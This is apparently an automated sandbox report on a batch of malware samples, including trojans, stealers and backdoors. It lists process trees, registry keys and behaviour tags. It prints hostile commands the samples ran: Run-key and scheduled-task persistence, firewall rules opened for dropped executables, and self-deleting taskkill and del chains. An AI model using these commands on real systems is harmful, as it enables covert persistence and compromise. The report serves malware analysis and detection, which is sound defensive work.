firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4092 2388 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 13 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 5020 attrib.exe 3004 attrib.exe 1956 attrib.exe 5000 attrib.exe 4584 attrib.exe 5992 attrib.exe 6056 attrib.exe 2400 attrib.exe 2332 attrib.exe 1568 attrib.exe 6028 attrib.exe 6048 attrib.exe 1488 attrib.exe -
outlook_office_path 1 IoCs
Processes:
Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe -
outlook_win_path 1 IoCs
Processes:
Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z"1⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1932 -parentBuildID 20240401114208 -prefsHandle 1860 -prefMapHandle 1640 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4cdafced-5364-4f10-9648-cd2174579329} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" gpu3⤵PID:4112
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2352 -parentBuildID 20240401114208 -prefsHandle 2336 -prefMapHandle 2332 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e66d49c4-6cb2-4cf0-91a1-7f50377b4bad} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" socket3⤵
- Checks processor information in registry
PID:4092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2864 -childID 1 -isForBrowser -prefsHandle 2752 -prefMapHandle 2900 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 988 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {202896fb-8e8e-4403-b458-7c69af5eeb51} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" tab3⤵PID:4992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2812 -childID 2 -isForBrowser -prefsHandle 3664 -prefMapHandle 3660 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 988 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e584556-2a6f-4c9a-9014-b9568d346384} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" tab3⤵PID:2576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4736 -prefMapHandle 4732 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6afd53a7-5117-4549-b396-af05295f43a8} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" utility3⤵
- Checks processor information in registry
PID:584
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5524 -childID 3 -isForBrowser -prefsHandle 5652 -prefMapHandle 4720 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 988 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e997dc79-47fc-4dd5-9e20-937d8e6dd0fb} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" tab3⤵PID:3820
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5796 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5668 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 988 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fb30fa9-1301-4c77-b597-36fefeae6b47} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" tab3⤵PID:4680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5980 -childID 5 -isForBrowser -prefsHandle 5992 -prefMapHandle 5996 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 988 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7811d2d-84f7-4629-bec7-96637d172d61} 2388 "\\.\pipe\gecko-crash-server-pipe.2388" tab3⤵PID:1788
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5116
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4488 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb6034cc40,0x7ffb6034cc4c,0x7ffb6034cc582⤵PID:1872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1800,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1796 /prefetch:22⤵PID:668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:32⤵PID:2360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2348 /prefetch:82⤵PID:3100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:2428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4488 /prefetch:12⤵PID:804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4808,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:82⤵PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,15402917276228348124,17997828317329910897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4888 /prefetch:82⤵PID:3324
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1304
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Bazaar.2020.04.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4380
-
C:\Users\Admin\Desktop\HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.exe"C:\Users\Admin\Desktop\HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.exe"1⤵
- Executes dropped EXE
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\is-4FV9U.tmp\HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FV9U.tmp\HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp" /SL5="$60252,14067504,888832,C:\Users\Admin\Desktop\HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1944 -
C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe"C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2800 -
C:\Users\Admin\AppData\Roaming\Proton Technologies AG\ProtonVPN\prerequisites\ProtonVPNTap.exe"C:\Users\Admin\AppData\Roaming\Proton Technologies AG\ProtonVPN\prerequisites\ProtonVPNTap.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:3824 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C23BCE3A-FD25-48BA-948E-2CE94576F983}\576F983\ProtonVPNTap.msi AI_SETUPEXEPATH="C:\Users\Admin\AppData\Roaming\Proton Technologies AG\ProtonVPN\prerequisites\ProtonVPNTap.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Roaming\Proton Technologies AG\ProtonVPN\prerequisites\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731802001 "5⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:4536
-
-
-
C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe"C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe" /i C:\Users\Admin\AppData\Local\Temp\{B351FE8E-8AA4-4E66-91C2-2082C21F9086}\21F9086\ProtonVPN_win_v1.13.4.msi AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Proton Technologies\ProtonVPN" SECONDSEQUENCE="1" CLIENTPROCESSID="2800" AI_MORE_CMD_LINE=14⤵
- Executes dropped EXE
- Enumerates connected drives
PID:3464
-
-
-
C:\Program Files (x86)\Windows NT\dllhost.exe"C:\Program Files (x86)\Windows NT\dllhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\svhost.exe"C:\Users\Admin\AppData\Local\Temp\svhost.exe"4⤵
- Executes dropped EXE
PID:804 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 804 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svhost.exe"5⤵PID:2524
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 8046⤵
- Kills process with taskkill
PID:3496
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:2976
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5D2AA4B0D3C9371F71416497A2494AB8 C2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1960 -
C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe"C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe" /groupsextract:103; /out:"C:\Users\Admin\AppData\Roaming\Proton Technologies AG\ProtonVPN\prerequisites" /callbackid:19603⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2416
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2A2BD74A26A7C2DAD0874EB4ADBF2F77 C2⤵
- Loads dropped DLL
PID:72
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EEF4C20CC7152DBFEE95915BD47CF75F2⤵
- Loads dropped DLL
PID:3840
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:1952
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AF516FB71FCA427693E5F889B0A8916F2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3128
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A16455C581770ADC08650A10D58C40AF E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3944 -
C:\Windows\SysWOW64\cmd.exe/C "C:\Users\Admin\AppData\Local\Temp\{E3F5A20C-EB57-4E9C-AC0E-7A8EAD6E6E8C}.bat"3⤵PID:2732
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exe/C "C:\Users\Admin\AppData\Local\Temp\{2E5C2799-4CC4-4D9F-B18F-7E30122566EC}.bat"3⤵PID:5036
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:4640
-
-
-
-
C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe"C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe"1⤵
- Executes dropped EXE
PID:1080 -
C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe"C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogeChromeAutoLaunch /f /d ""C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe"""3⤵PID:1784
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogeChromeAutoLaunch /f /d ""C:\Users\Admin\Desktop\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe""4⤵
- Adds Run key to start application
- Modifies registry key
PID:1380
-
-
-
-
C:\Users\Admin\Desktop\HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe"C:\Users\Admin\Desktop\HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1096 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RDZJXJbUt" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1559.tmp"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3280
-
-
C:\Users\Admin\Desktop\HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe"{path}"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
PID:2692
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3312
-
C:\Users\Admin\Desktop\Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe"C:\Users\Admin\Desktop\Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe"1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SendNotifyMessage
PID:4608 -
C:\Users\Admin\Desktop\Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe"C:\Users\Admin\Desktop\Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:4428
-
-
C:\Users\Admin\Desktop\Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exe"C:\Users\Admin\Desktop\Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5008 -
C:\Users\Admin\AppData\Roaming\WindowsSearch\SearchIndexer.exe"C:\Users\Admin\AppData\Roaming\WindowsSearch\SearchIndexer.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1312
-
-
C:\Users\Admin\Desktop\Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe"C:\Users\Admin\Desktop\Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4416 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 4416 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe"2⤵PID:1852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 44163⤵
- Kills process with taskkill
PID:2880
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:4912
-
-
-
C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:780 -
C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4444 -
C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2464 -
C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"C:\Users\Admin\Desktop\UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
PID:1512 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2992
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\773420fdf180\773420fdf180\773420fdf180.exe" enable=yes"5⤵PID:3048
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\773420fdf180\773420fdf180\773420fdf180.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1820
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2904 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""6⤵
- Executes dropped EXE
- Manipulates WinMonFS driver.
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3964 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Scheduled Task/Job: Scheduled Task
PID:1752
-
-
